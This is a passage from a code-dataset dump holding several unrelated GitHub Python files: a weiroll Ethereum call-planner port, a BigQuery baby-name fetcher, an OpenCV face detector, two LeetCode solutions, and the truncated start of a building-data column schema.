https://github.com/weiroll/weiroll.js/pull/34\n \"\"\"\n\n\n if not inputs:\n return None, None\n\n simple_inputs = []\n simple_sizes = []\n for i in inputs:\n if i.endswith(\"]\") and not i.endswith(\"[]\"):\n # fixed size array. cut it up\n m = re.match(r\"([a-z0-9]+)\\[([0-9]+)\\]\", i)\n\n size = int(m.group(2))\n\n simple_inputs.extend([m.group(1)] * size)\n simple_sizes.append(size)\n elif i.startswith(\"(\") and i.endswith(\")\") and not isDynamicType(i):\n types = i[1:-1].split(\",\")\n\n simple_inputs.extend(types)\n simple_sizes.append(len(types))\n else:\n simple_inputs.append(i)\n simple_sizes.append(1)\n\n if all([s == 1 for s in simple_sizes]):\n # if no inputs or all the inputs are easily handled sizes, we don't need to simplify them\n # we don't clear simple_inputs because its simpler for that to just be a copy of self.inputs\n simple_sizes = None\n\n return simple_inputs, simple_sizes\n\n\ndef simple_args(simple_sizes, args):\n \"\"\"split up complex types into 32 byte chunks that weiroll state can handle.\"\"\"\n if not simple_sizes:\n # no need to handle anything specially\n return args\n\n simplified = []\n for i, size in enumerate(simple_sizes):\n if size == 1:\n # no need to do anything fancy\n simplified.append(args[i])\n else:\n simplified.extend(args[i])\n\n return simplified\n\n\n# TODO: not sure about this class. its mostly here because this is how the javascript sdk works. now that this works, i think we can start refactoring to use brownie more directly\nclass FunctionFragment:\n def __init__(self, brownieContract: brownie.Contract, selector):\n function_name = brownieContract.selectors[selector]\n\n function = getattr(brownieContract, function_name)\n\n if isinstance(function, OverloadedMethod):\n overloaded_func = None\n for m in function.methods.values():\n # TODO: everyone is inconsistent about signature vs selector vs name\n if m.signature == selector:\n overloaded_func = m\n break\n\n assert overloaded_func\n function = overloaded_func\n\n self.function = function\n self.name = function_name\n self.signature = function.signature\n self.inputs = get_type_strings(function.abi[\"inputs\"])\n\n # look at the inputs that aren't dynamic types but also aren't 32 bytes long and cut them up\n self.simple_inputs, self.simple_sizes = simple_type_strings(self.inputs)\n\n self.outputs = get_type_strings(function.abi[\"outputs\"])\n # TODO: do something to handle outputs of uncommon types?\n\n def encode_args(self, *args):\n if len(args) != len(self.inputs):\n raise ValueError(f\"Function {self.name} has {len(self.inputs)} arguments but {len(self.args)} provided\")\n\n # split up complex types into 32 byte chunks that weiroll state can handle\n args = simple_args(self.simple_sizes, args)\n\n return [encodeArg(arg, self.simple_inputs[i]) for (i, arg) in enumerate(args)]\n\n\nclass StateValue:\n def __init__(self):\n self.param = \"bytes[]\"\n\n\nclass SubplanValue:\n def __init__(self, planner):\n self.param = \"bytes[]\"\n self.planner = planner\n\n\n# TODO: use python ABC or something like that?\ndef isValue(arg):\n if isinstance(arg, Value):\n return True\n if isinstance(arg, LiteralValue):\n return True\n if isinstance(arg, ReturnValue):\n return True\n if isinstance(arg, StateValue):\n return True\n if isinstance(arg, SubplanValue):\n return True\n return False\n\n\n# TODO: this needs tests! I'm 90% sure this is wrong for lists\n# TODO: does eth_utils not already have this? it seems like other people should have written something like this\ndef hexConcat(*items) -> HexBytes:\n result = b\"\"\n for item in items:\n if isinstance(item, list):\n item = hexConcat(*item)\n else:\n item = HexBytes(item)\n result += bytes(item)\n return HexBytes(result)\n\n\nclass CommandFlags(IntFlag):\n # Specifies that a call should be made using the DELEGATECALL opcode\n DELEGATECALL = 0x00\n # Specifies that a call should be made using the CALL opcode\n CALL = 0x01\n # Specifies that a call should be made using the STATICCALL opcode\n STATICCALL = 0x02\n # Specifies that a call should be made using the CALL opcode, and that the first argument will be the value to send\n CALL_WITH_VALUE = 0x03\n # A bitmask that selects calltype flags\n CALLTYPE_MASK = 0x03\n # Specifies that this is an extended command, with an additional command word for indices. Internal use only.\n EXTENDED_COMMAND = 0x40\n # Specifies that the return value of this call should be wrapped in a `bytes`. Internal use only.\n TUPLE_RETURN = 0x80\n\n\nclass FunctionCall:\n def __init__(self, contract, flags: CommandFlags, fragment: FunctionFragment, args, callvalue=0):\n self.contract = contract\n self.flags = flags\n self.fragment = fragment\n self.args = args\n self.callvalue = callvalue\n\n def withValue(self, value):\n \"\"\"\n Returns a new [[FunctionCall]] that sends value with the call.\n @param value The value (in wei) to send with the call\n \"\"\"\n if (self.flags & CommandFlags.CALLTYPE_MASK) != CommandFlags.CALL and (\n self.flags & CommandFlags.CALLTYPE_MASK\n ) != CommandFlags.CALL_WITH_VALUE:\n raise ValueError(\"Only CALL operations can send value\")\n return self.__class__(\n self.contract,\n (self.flags & ~CommandFlags.CALLTYPE_MASK) | CommandFlags.CALL_WITH_VALUE,\n self.fragment,\n self.args,\n eth_abi.encode_single(\"uint\", value),\n )\n\n def rawValue(self):\n \"\"\"\n Returns a new [[FunctionCall]] whose return value will be wrapped as a `bytes`.\n This permits capturing the return values of functions with multiple return parameters,\n which weiroll does not otherwise support.\n \"\"\"\n return self.__class__(\n self.contract,\n self.flags | CommandFlags.TUPLE_RETURN,\n self.fragment,\n self.args,\n self.callvalue,\n )\n\n def staticcall(self):\n \"\"\"Returns a new [[FunctionCall]] that executes a STATICCALL instead of a regular CALL.\"\"\"\n if (self.flags & CommandFlags.CALLTYPE_MASK) != CommandFlags.CALL:\n raise ValueError(\"Only CALL operations can be made static\")\n return self.__class__(\n self.contract,\n (self.flags & ~CommandFlags.CALLTYPE_MASK) | CommandFlags.STATICCALL,\n self.fragment,\n self.args,\n self.callvalue,\n )\n\n\ndef isDynamicType(param) -> bool:\n return eth_abi.grammar.parse(param).is_dynamic\n\n\ndef encodeArg(arg, param):\n if isValue(arg):\n if arg.param != param:\n raise ValueError(f\"Cannot pass value of type ${arg.param} to input of type ${param}\")\n return arg\n if isinstance(arg, WeirollPlanner):\n return SubplanValue(arg)\n return LiteralValue(param, eth_abi.encode_single(param, arg))\n\n\nclass WeirollContract:\n \"\"\"\n * Provides a dynamically created interface to interact with Ethereum contracts via weiroll.\n *\n * Once created using the constructor or the [[Contract.createContract]] or [[Contract.createLibrary]]\n * functions, the returned object is automatically populated with methods that match those on the\n * supplied contract. For instance, if your contract has a method `add(uint, uint)`, you can call it on the\n * [[Contract]] object:\n * ```typescript\n * // Assumes `Math` is an ethers.js Contract instance.\n * const math = Contract.createLibrary(Math);\n * const result = math.add(1, 2);\n * ```\n *\n * Calling a contract function returns a [[FunctionCall]] object, which you can pass to [[Planner.add]],\n * [[Planner.addSubplan]], or [[Planner.replaceState]] to add to the sequence of calls to plan.\n \"\"\"\n\n def __init__(self, brownieContract: brownie.Contract, commandFlags: CommandFlags = 0):\n self.brownieContract = brownieContract\n self.address = brownieContract.address\n\n self.commandFlags = commandFlags\n self.functions = {} # aka functionsBySelector\n self.functionsBySignature = {}\n self.fragmentsBySelector = {}\n\n selectorsByName = defaultdict(list)\n\n for selector, name in self.brownieContract.selectors.items():\n fragment = FunctionFragment(self.brownieContract, selector)\n\n # Check that the signature is unique; if not the ABI generation has\n # not been cleaned or may be incorrectly generated\n if selector in self.functions:\n raise ValueError(f\"Duplicate ABI entry for selector: {selector}\")\n\n self.fragmentsBySelector[selector] = fragment\n\n plan_fn = buildCall(self, fragment)\n\n # save this plan helper function fragment in self.functions\n self.functions[selector] = plan_fn\n\n # make the plan helper function available on self by selector\n setattr(self, selector, plan_fn)\n\n # Track unique names; we only expose bare named functions if they are ambiguous\n selectorsByName[name].append(selector)\n\n self.functionsByUniqueName = {}\n\n for name, selectors in selectorsByName.items():\n # Ambiguous names to not get attached as bare names\n if len(selectors) == 1:\n if hasattr(self, name):\n # TODO: i think this is impossible\n raise ValueError(\"duplicate name!\")\n\n plan_fn = self.functions[selectors[0]]\n\n # make the plan helper function available on self\n setattr(self, name, plan_fn)\n self.functionsByUniqueName[name] = plan_fn\n else:\n # define a new function which will use brownie' get_fn_from_args\n # to decide which plan_fn to route to\n def _overload(*args, fn_name=name):\n overload_method = self.brownieContract.__getattribute__(fn_name)\n method = overload_method._get_fn_from_args(args)\n signature = method.signature\n plan_fn = self.functions[signature]\n return plan_fn(*args)\n\n setattr(self, name, _overload)\n\n # attach full signatures (for methods with duplicate names)\n for selector in selectors:\n fragment = self.fragmentsBySelector[selector]\n\n signature = name + \"(\" + \",\".join(fragment.inputs) + \")\"\n\n plan_fn = self.functions[selector]\n\n self.functionsBySignature[signature] = plan_fn\n\n\n @classmethod\n @cache\n def createContract(\n cls,\n contract: brownie.Contract,\n commandflags=CommandFlags.CALL,\n ):\n \"\"\"\n Creates a [[Contract]] object from an ethers.js contract.\n All calls on the returned object will default to being standard CALL operations.\n Use this when you want your weiroll script to call a standard external contract.\n @param contract The ethers.js Contract object to wrap.\n @param commandflags Optionally specifies a non-default call type to use, such as\n [[CommandFlags.STATICCALL]].\n \"\"\"\n assert commandflags != CommandFlags.DELEGATECALL\n return cls(\n contract,\n commandflags,\n )\n\n @classmethod\n @cache\n def createLibrary(\n cls,\n contract: brownie.Contract,\n ):\n \"\"\"\n * Creates a [[Contract]] object from an ethers.js contract.\n * All calls on the returned object will default to being DELEGATECALL operations.\n * Use this when you want your weiroll script to call a library specifically designed\n * for use with weiroll.\n * @param contract The ethers.js Contract object to wrap.\n \"\"\"\n return cls(contract, CommandFlags.DELEGATECALL)\n\n # TODO: port getInterface?\n\n\n# TODO: not sure about this one. this was just how the javascript code worked, but can probably be refactored\ndef buildCall(contract: WeirollContract, fragment: FunctionFragment):\n def _call(*args) -> FunctionCall:\n if len(args) != len(fragment.inputs):\n raise ValueError(f\"Function {fragment.name} has {len(fragment.inputs)} arguments but {len(args)} provided\")\n\n # TODO: maybe this should just be fragment.encode_args()\n encodedArgs = fragment.encode_args(*args)\n\n return FunctionCall(\n contract,\n contract.commandFlags,\n fragment,\n encodedArgs,\n )\n\n return _call\n\n\nclass CommandType(IntEnum):\n CALL = 1\n RAWCALL = 2\n SUBPLAN = 3\n\n\nCommand = namedtuple(\"Command\", \"call,type\")\n\n\n# returnSlotMap: Maps from a command to the slot used for its return value\n# literalSlotMap: Maps from a literal to the slot used to store it\n# freeSlots: An array of unused state slots\n# stateExpirations: Maps from a command to the slots that expire when it's executed\n# commandVisibility: Maps from a command to the last command that consumes its output\n# state: The initial state array\nPlannerState = namedtuple(\n \"PlannerState\",\n \"returnSlotMap, literalSlotMap, freeSlots, stateExpirations, commandVisibility, state\",\n)\n\n\ndef padArray(a, length, padValue) -> list:\n return a + [padValue] * (length - len(a))\n\n\nclass WeirollPlanner:\n def __init__(self, clone):\n self.state = StateValue()\n self.commands: list[Command] = []\n self.unlimited_approvals = set()\n\n self.clone = clone\n\n def approve(self, token: brownie.Contract, spender: str, wei_needed, approve_wei=None) -> Optional[ReturnValue]:\n key = (token, self.clone, spender)\n\n if approve_wei is None:\n approve_wei = MAX_UINT256\n\n if key in self.unlimited_approvals and approve_wei != 0:\n # we already planned an infinite approval for this token (and we aren't trying to set the approval to 0)\n return\n\n # check current allowance\n if token.allowance(self.clone, spender) >= wei_needed:\n return\n\n if approve_wei == MAX_UINT256:\n self.unlimited_approvals.add(key)\n\n return self.call(token, \"approve\", spender, approve_wei)\n\n def call(self, brownieContract: brownie.Contract, func_name, *args):\n \"\"\"func_name can be just the name, or it can be the full signature.\n\n If there are multiple functions with the same name, you must use the signature.\n\n TODO: brownie has some logic for figuring out which overloaded method to use. we should use that here\n \"\"\"\n weirollContract = WeirollContract.createContract(brownieContract)\n\n if func_name.endswith(\")\"):\n # TODO: would be interesting to look at args and do this automatically\n func = weirollContract.functionsBySignature[func_name]\n else:\n func = weirollContract.functionsByUniqueName[func_name]\n\n return self.add(func(*args))\n\n def delegatecall(self, brownieContract: brownie.Contract, func_name, *args):\n contract = WeirollContract.createLibrary(brownieContract)\n\n if func_name in contract.functionsByUniqueName:\n func = contract.functionsByUniqueName[func_name]\n elif func_name in contract.functionsBySignature:\n func = contract.functionsBySignature[func_name]\n else:\n # print(\"func_name:\", func_name)\n # print(\"functionsByUniqueName:\", contract.functionsByUniqueName)\n # print(\"functionsBySignature:\", contract.functionsBySignature)\n raise ValueError(f\"Unknown func_name ({func_name}) on {brownieContract}\")\n\n return self.add(func(*args))\n\n def add(self, call: FunctionCall) -> Optional[ReturnValue]:\n \"\"\"\n * Adds a new function call to the planner. Function calls are executed in the order they are added.\n *\n * If the function call has a return value, `add` returns an object representing that value, which you\n * can pass to subsequent function calls. For example:\n * ```typescript\n * const math = Contract.createLibrary(Math); // Assumes `Math` is an ethers.js contract object\n * const events = Contract.createLibrary(Events); // Assumes `Events` is an ethers.js contract object\n * const planner = new Planner();\n * const sum = planner.add(math.add(21, 21));\n * planner.add(events.logUint(sum));\n * ```\n * @param call The [[FunctionCall]] to add to the planner\n * @returns An object representing the return value of the call, or null if it does not return a value.\n \"\"\"\n command = Command(call, CommandType.CALL)\n self.commands.append(command)\n\n for arg in call.args:\n if isinstance(arg, SubplanValue):\n raise ValueError(\"Only subplans can have arguments of type SubplanValue\")\n\n if call.flags & CommandFlags.TUPLE_RETURN:\n return ReturnValue(\"bytes\", command)\n\n # TODO: test this more\n if len(call.fragment.outputs) != 1:\n return None\n\n # print(\"call fragment outputs\", call.fragment.outputs)\n\n return ReturnValue(call.fragment.outputs[0], command)\n\n def subcall(self, brownieContract: brownie.Contract, func_name, *args):\n \"\"\"\n * Adds a call to a subplan. This has the effect of instantiating a nested instance of the weiroll\n * interpreter, and is commonly used for functionality such as flashloans, control flow, or anywhere\n * else you may need to execute logic inside a callback.\n *\n * A [[FunctionCall]] passed to [[Planner.addSubplan]] must take another [[Planner]] object as one\n * argument, and a placeholder representing the planner state, accessible as [[Planner.state]], as\n * another. Exactly one of each argument must be provided.\n *\n * At runtime, the subplan is replaced by a list of commands for the subplanner (type `bytes32[]`),\n * and `planner.state` is replaced by the current state of the parent planner instance (type `bytes[]`).\n *\n * If the `call` returns a `bytes[]`, this will be used to replace the parent planner's state after\n * the call to the subplanner completes. Return values defined inside a subplan may be used outside that\n * subplan - both in the parent planner and in subsequent subplans - only if the `call` returns the\n * updated planner state.\n *\n * Example usage:\n * ```\n * const exchange = Contract.createLibrary(Exchange); // Assumes `Exchange` is an ethers.js contract\n * const events = Contract.createLibrary(Events); // Assumes `Events` is an ethers.js contract\n * const subplanner = new Planner();\n * const outqty = subplanner.add(exchange.swap(tokenb, tokena, qty));\n *\n * const planner = new Planner();\n * planner.addSubplan(exchange.flashswap(tokena, tokenb, qty, subplanner, planner.state));\n * planner.add(events.logUint(outqty)); // Only works if `exchange.flashswap` returns updated state\n * ```\n * @param call The [[FunctionCall]] to add to the planner.\n \"\"\"\n contract = WeirollContract.createContract(brownieContract)\n func = getattr(contract, func_name)\n func_call = func(*args)\n return self.addSubplan(func_call)\n\n def subdelegatecall(self, brownieContract: brownie.Contract, func_name, *args):\n contract = WeirollContract.createLibrary(brownieContract)\n func = getattr(contract, func_name)\n func_call = func(*args)\n return self.addSubplan(func_call)\n\n def addSubplan(self, call: FunctionCall):\n hasSubplan = False\n hasState = False\n\n for arg in call.args:\n if isinstance(arg, SubplanValue):\n if hasSubplan:\n raise ValueError(\"Subplans can only take one planner argument\")\n hasSubplan = True\n elif isinstance(arg, StateValue):\n if hasState:\n raise ValueError(\"Subplans can only take one state argument\")\n hasState = True\n if not hasSubplan or not hasState:\n raise ValueError(\"Subplans must take planner and state arguments\")\n if call.fragment.outputs and len(call.fragment.outputs) == 1 and call.fragment.outputs[0] != \"bytes[]\":\n raise ValueError(\"Subplans must return a bytes[] replacement state or nothing\")\n\n self.commands.append(Command(call, CommandType.SUBPLAN))\n\n def replaceState(self, call: FunctionCall):\n \"\"\"\n * Executes a [[FunctionCall]], and replaces the planner state with the value it\n * returns. This can be used to execute functions that make arbitrary changes to\n * the planner state. Note that the planner library is not aware of these changes -\n * so it may produce invalid plans if you don't know what you're doing.\n * @param call The [[FunctionCall]] to execute\n \"\"\"\n if (call.fragment.outputs and len(call.fragment.outputs) != 1) or call.fragment.outputs[0] != \"bytes[]\":\n raise ValueError(\"Function replacing state must return a bytes[]\")\n self.commands.append(Command(call, CommandType.RAWCALL))\n\n def _preplan(self, commandVisibility, literalVisibility, seen=None, planners=None):\n if seen is None:\n seen: set[Command] = set()\n if planners is None:\n planners: set[WeirollPlanner] = set()\n\n if self in planners:\n raise ValueError(\"A planner cannot contain itself\")\n planners.add(self)\n\n # Build visibility maps\n for command in self.commands:\n inargs = command.call.args\n if command.call.flags & CommandFlags.CALLTYPE_MASK == CommandFlags.CALL_WITH_VALUE:\n if not command.call.callvalue:\n raise ValueError(\"Call with value must have a value parameter\")\n inargs = [command.call.callvalue] + inargs\n\n for arg in inargs:\n if isinstance(arg, ReturnValue):\n if not arg.command in seen:\n raise ValueError(f\"Return value from '{arg.command.call.fragment.name}' is not visible here\")\n commandVisibility[arg.command] = command\n elif isinstance(arg, LiteralValue):\n literalVisibility[arg.value] = command\n elif isinstance(arg, SubplanValue):\n subplanSeen = seen # do not copy\n if not command.call.fragment.outputs:\n # Read-only subplan; return values aren't visible externally\n subplanSeen = set(seen)\n arg.planner._preplan(commandVisibility, literalVisibility, subplanSeen, planners)\n elif not isinstance(arg, StateValue):\n raise ValueError(f\"Unknown function argument type '{arg}'\")\n\n seen.add(command)\n\n return commandVisibility, literalVisibility\n\n def _buildCommandArgs(self, command: Command, returnSlotMap, literalSlotMap, state):\n # Build a list of argument value indexes\n inargs = command.call.args\n if command.call.flags & CommandFlags.CALLTYPE_MASK == CommandFlags.CALL_WITH_VALUE:\n if not command.call.callvalue:\n raise ValueError(\"Call with value must have a value parameter\")\n inargs = [command.call.callvalue] + inargs\n\n args: list[int] = []\n for arg in inargs:\n if isinstance(arg, ReturnValue):\n slot = returnSlotMap[arg.command]\n elif isinstance(arg, LiteralValue):\n slot = literalSlotMap[arg.value]\n elif isinstance(arg, StateValue):\n slot = 0xFE\n elif isinstance(arg, SubplanValue):\n # buildCommands has already built the subplan and put it in the last state slot\n slot = len(state) - 1\n else:\n raise ValueError(f\"Unknown function argument type {arg}\")\n if isDynamicType(arg.param):\n slot |= 0x80\n args.append(slot)\n\n return args\n\n def _buildCommands(self, ps: PlannerState) -> list[str]:\n encodedCommands = []\n for command in self.commands:\n if command.type == CommandType.SUBPLAN:\n # find the subplan\n subplanner = next(arg for arg in command.call.args if isinstance(arg, SubplanValue)).planner\n subcommands = subplanner._buildCommands(ps)\n ps.state.append(HexBytes(eth_abi.encode_single(\"bytes32[]\", subcommands))[32:])\n # The slot is no longer needed after this command\n ps.freeSlots.append(len(ps.state) - 1)\n\n flags = command.call.flags\n\n args = self._buildCommandArgs(command, ps.returnSlotMap, ps.literalSlotMap, ps.state)\n\n if len(args) > 6:\n flags |= CommandFlags.EXTENDED_COMMAND\n\n # Add any newly unused state slots to the list\n ps.freeSlots.extend(ps.stateExpirations[command])\n\n ret = 0xFF\n if command in ps.commandVisibility:\n if command.type in [CommandType.RAWCALL, CommandType.SUBPLAN]:\n raise ValueError(\n f\"Return value of {command.call.fragment.name} cannot be used to replace state and in another function\"\n )\n ret = len(ps.state)\n\n if len(ps.freeSlots) > 0:\n ret = ps.freeSlots.pop()\n\n # store the slot mapping\n ps.returnSlotMap[command] = ret\n\n # make the slot available when it's not needed\n expiryCommand = ps.commandVisibility[command]\n ps.stateExpirations[expiryCommand].append(ret)\n\n if ret == len(ps.state):\n ps.state.append(b\"\")\n\n if (\n command.call.fragment.outputs and isDynamicType(command.call.fragment.outputs[0])\n ) or command.call.flags & CommandFlags.TUPLE_RETURN != 0:\n ret |= 0x80\n elif command.type in [CommandType.RAWCALL, CommandType.SUBPLAN]:\n if command.call.fragment.outputs and len(command.call.fragment.outputs) == 1:\n ret = 0xFE\n\n if flags & CommandFlags.EXTENDED_COMMAND == CommandFlags.EXTENDED_COMMAND:\n # extended command\n encodedCommands.extend(\n [\n hexConcat(\n command.call.fragment.signature,\n flags,\n [0xFF] * 6,\n ret,\n command.call.contract.address,\n ),\n hexConcat(padArray(args, 32, 0xFF)),\n ]\n )\n else:\n # standard command\n encodedCommands.append(\n hexConcat(\n command.call.fragment.signature,\n flags,\n padArray(args, 6, 0xFF),\n ret,\n command.call.contract.address,\n )\n )\n return encodedCommands\n\n def plan(self) -> tuple[list[str], list[str]]:\n # Tracks the last time a literal is used in the program\n literalVisibility: dict[str, Command] = {}\n # Tracks the last time a command's output is used in the program\n commandVisibility: dict[Command, Command] = {}\n\n self._preplan(commandVisibility, literalVisibility)\n\n # Maps from commands to the slots that expire on execution (if any)\n stateExpirations: dict[Command, list[int]] = defaultdict(list)\n\n # Tracks the state slot each literal is stored in\n literalSlotMap: dict[str, int] = {}\n\n state: list[str] = []\n\n # Prepopulate the state and state expirations with literals\n for (literal, lastCommand) in literalVisibility.items():\n slot = len(state)\n state.append(literal)\n literalSlotMap[literal] = slot\n stateExpirations[lastCommand].append(slot)\n\n ps: PlannerState = PlannerState(\n returnSlotMap={},\n literalSlotMap=literalSlotMap,\n freeSlots=[],\n stateExpirations=stateExpirations,\n commandVisibility=commandVisibility,\n state=state,\n )\n\n encodedCommands = self._buildCommands(ps)\n\n return encodedCommands, state\n","repo_name":"fp-crypto/weiroll-py","sub_path":"weiroll.py","file_name":"weiroll.py","file_ext":"py","file_size_in_byte":29865,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"51"} +{"seq_id":"74694452638","text":"#-*- coding:utf-8 -*-\nfrom preprocess import Vector\nimport sys\n\n\ndef list2file(rs_list, fout):\n with open(fout, 'w') as f:\n for i, val in enumerate(rs_list):\n f.write(\"{}\\n\".format(val.encode(\"utf-8\")))\n\n\n\nif __name__ == \"__main__\":\n fin = sys.argv[1]\n fout = sys.argv[2]\n\n rs_list = []\n with open(fin, 'r') as f:\n for line in f:\n vec1 = Vector.str2vec(line.strip(\"\\r\\n\"))\n rs_list.append(vec1)\n list2file(rs_list, fout)\n\n","repo_name":"ddskyfuyu/robot","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73076486878","text":"from google.cloud import bigquery\nfrom google_auth_oauthlib import flow\nimport argparse\nimport time\nimport uuid\n\n'''\nhttps://cloud.google.com/bigquery/public-data/usa-names\nhttps://cloud.google.com/bigquery/authentication\n'''\n\ndef get(filename):\n\tdef fetchData():\n\t\tdef wait_for_job(job):\n\t\t\twhile True:\n\t\t\t\tjob.reload() # Refreshes the state via a GET request.\n\t\t\t\tif job.state == 'DONE':\n\t\t\t\t\tif job.error_result:\n\t\t\t\t\t\traise RuntimeError(job.errors)\n\t\t\t\t\treturn\n\t\t\t\ttime.sleep(1)\n\n\t\tdef run_query(credentials, project, query):\n\t\t\tclient = bigquery.Client(project=project, credentials=credentials)\n\t\t\tquery_job = client.run_async_query(str(uuid.uuid4()), query)\n\t\t\tquery_job.use_legacy_sql = False\n\t\t\tquery_job.begin()\n\n\t\t\twait_for_job(query_job)\n\n\t\t\tquery_results = query_job.results()\n\t\t\trows = query_results.fetch_data()\n\n\t\t\treturn rows\n\n\n\t\tdef authenticate_and_query(project, query, launch_browser=True):\n\t\t\tappflow = flow.InstalledAppFlow.from_client_secrets_file(\n\t\t\t\t'client_secret.json',\n\t\t\t\tscopes=['https://www.googleapis.com/auth/bigquery'])\n\n\t\t\tif launch_browser:\n\t\t\t\tappflow.run_local_server()\n\t\t\telse:\n\t\t\t\tappflow.run_console()\n\n\t\t\treturn run_query(appflow.credentials, project, query)\n\n\t\tquery = \"\"\"\n\t\t#StandardSQL\n\t\tSelect state,gender,year,name,number\n\t\tFrom `bigquery-public-data.usa_names.usa_1910_current`\n\n\t\tOrder by name,year\n\t\t\"\"\"\n\t\treturn authenticate_and_query(\"names-project-175500\", query)\n\n\n\tout = fetchData()\n\twith open(filename, \"w+\") as f:\n\t\tf.write(\"state,gender,year,name,number\")\n\t\tfor row in out:\n\t\t\tf.write(\"{},{},{},{},{}\".format(str(row[0]), str(row[1]), str(row[2]), str(row[3]), str(row[4])) + \"\\n\")\n\n\treturn filename\n\nget(\"raw.csv\")","repo_name":"DellAgli/US-Census-Name-History-Visualizer","sub_path":"Fetch/Data/getdataraw.py","file_name":"getdataraw.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"1246224467","text":"import cv2\n\n#Load some pre-trained data on face frontals from opencv (haar cascade algorithm)\npre_trained_face_data = cv2.CascadeClassifier('haarcascade_frontal_face.xml')\n\n#Choose an image to detect faces in and grayscale it\ndetectable_img = cv2.imread('34.webp')\ngrayscaled_img = cv2.cvtColor(detectable_img, cv2.COLOR_BGR2GRAY)\n\n#Detect faces\nface_coordinates = pre_trained_face_data.detectMultiScale(grayscaled_img)\n\n#Draw a rectangle to a face\nfor (x, y, w, z) in face_coordinates:\n cv2.rectangle(detectable_img, (x, y), (x + w, y + z), (0, 255, 0), 2)\n\nprint(face_coordinates)\n\n#Show the face\ncv2.imshow('Face detector', detectable_img)\ncv2.waitKey();\n\nprint(\"Code completed\")","repo_name":"pylnpt/face_recognition","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5745908559","text":"class Solution(object):\n def partition(self, s):\n \"\"\"\n :type s: str\n :rtype: List[List[str]]\n \"\"\"\n res = []\n slength = len(s)\n \n def backtrack(partition, index):\n if index == slength:\n res.append(partition)\n return \n \n for i in range(index, slength+1):\n substring = s[index: i+1]\n if substring == substring[::-1]:\n backtrack(partition+[substring], i+1)\n \n backtrack([], 0)\n return res\n","repo_name":"kapil87/LeetCode","sub_path":"palindromePartitionBacktracking.py","file_name":"palindromePartitionBacktracking.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43703699587","text":"class Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n starting_spot = 0\n current_gas = 0\n total_gas = 0\n for i in range(len(gas)):\n current_gas += gas[i] - cost[i]\n total_gas += gas[i] - cost[i]\n \n if current_gas < 0:\n current_gas = 0\n starting_spot = i+1\n \n if total_gas < 0:\n return -1\n else:\n return starting_spot\n\n\n\n# 시간 초과로 인해 실패하고 다음에 고쳐볼 코드\n\n# if len(gas) == 1 and gas[0] >= cost[0]:\n# return 0\n \n# able_starting_point = [i for i in range(len(gas)) if gas[i] - cost[i] >= 0] # 리스트 컴프리헨션으로 가능한 시작지점을 찾음\n# if not able_starting_point: # 가능한 시작 지점이 없는 경우\n# return -1\n \n \n# for starting_spot in able_starting_point:\n# current_gas = 0\n# current_spot = starting_spot\n# for n in range(len(gas)):\n# current_gas += gas[current_spot] # 현 시점에서 가스를 먼저 채우고\n# current_gas -= cost[current_spot] # 현 지점에서 다음 지점으로 이동하는데에 드는 코스트를 계산\n# if current_gas < 0:\n# break\n# current_spot = (current_spot+1) % len(gas)\n# if current_gas >= 0:\n# return starting_spot\n \n# return -1","repo_name":"jkhyjkhy/LeetCode","sub_path":"0134-gas-station/0134-gas-station.py","file_name":"0134-gas-station.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70922603998","text":"import numpy as np\nfrom pathlib import Path\nimport h5py\nimport pandas as pd\n\n\nBUILDING_CLASS_COLUMNS = {\n \"index\": int,\n \"name\": str,\n \"construction_period_start\": int,\n \"construction_period_end\": int,\n \"building_categories_index\": int,\n \"number_of_dwellings_per_building\": \"float32\",\n \"number_of_persons_per_dwelling\": \"float32\",\n \"length_of_building\": \"float32\",\n \"width_of_building\": \"float32\",\n \"number_of_floors\": \"float32\",\n \"room_height\": \"float32\",\n \"percentage_of_building_surface_attached_length\": \"float32\",\n \"percentage_of_building_surface_attached_width\": \"float32\",\n \"share_of_window_area_on_gross_surface_area\": \"float32\",\n \"share_of_windows_oriented_to_south\": \"float32\",\n \"share_of_windows_oriented_to_north\": \"float32\",\n \"grossfloor_area\": \"float32\",\n \"heated_area\": \"float32\",\n \"areafloor\": \"float32\",\n \"areawindows\": \"float32\",\n \"area_suitable_solar\": \"float32\",\n \"grossvolume\": \"float32\",\n \"heatedvolume\": \"float32\",\n \"heated_norm_volume\": \"float32\",\n \"hwb\": \"float32\",\n \"hwb_norm\": \"float32\",\n \"u_value_ceiling\": \"float32\",\n \"u_value_exterior_walls\": \"float32\",\n \"u_value_windows1\": \"float32\",\n \"u_value_windows2\": \"float32\",\n \"u_value_roof\": \"float32\",\n \"u_value_floor\": \"float32\",\n \"seam_loss_windows\": \"float32\",\n \"trans_loss_walls\": \"float32\",\n \"trans_loss_ceil\": \"float32\",\n \"trans_loss_wind\": \"float32\",\n \"trans_loss_floor\": \"float32\",\n \"trans_loss_therm_bridge\": \"float32\",\n \"trans_loss_ventilation\": \"float32\",\n \"total_heat_losses\": \"float32\",\n \"average_effective_area_wind_west_east_red_cool\": \"float32\",\n \"average_effective_area_wind_south_red_cool\": \"float32\",\n \"average_effective_area_wind_north_red_cool\": \"float32\",\n \"spec_int_gains_cool_watt\": \"float32\",\n \"attached_surface_area\": \"float32\",\n \"n_50\": \"float32\",\n}\n\nBUILDING_SEGMENT_COLUMNS = {\n \"index\": int,\n \"name\": str,\n \"building_classes_index\": int,\n \"number_of_buildings\": \"float32\",\n \"heat_supply_system_index\": int,\n \"installation_year_system_start\": \"float32\",\n \"installation_year_system_end\": \"float32\",\n \"distribution_sh_index\": int,\n \"distribution_dhw_index\": int,\n \"pv_system_index\": int,\n \"energy_carrier\": int,\n \"annual_energy_costs_hs\": \"float32\",\n \"total_annual_cost_hs\": \"float32\",\n \"annual_energy_costs_dhw\": \"float32\",\n 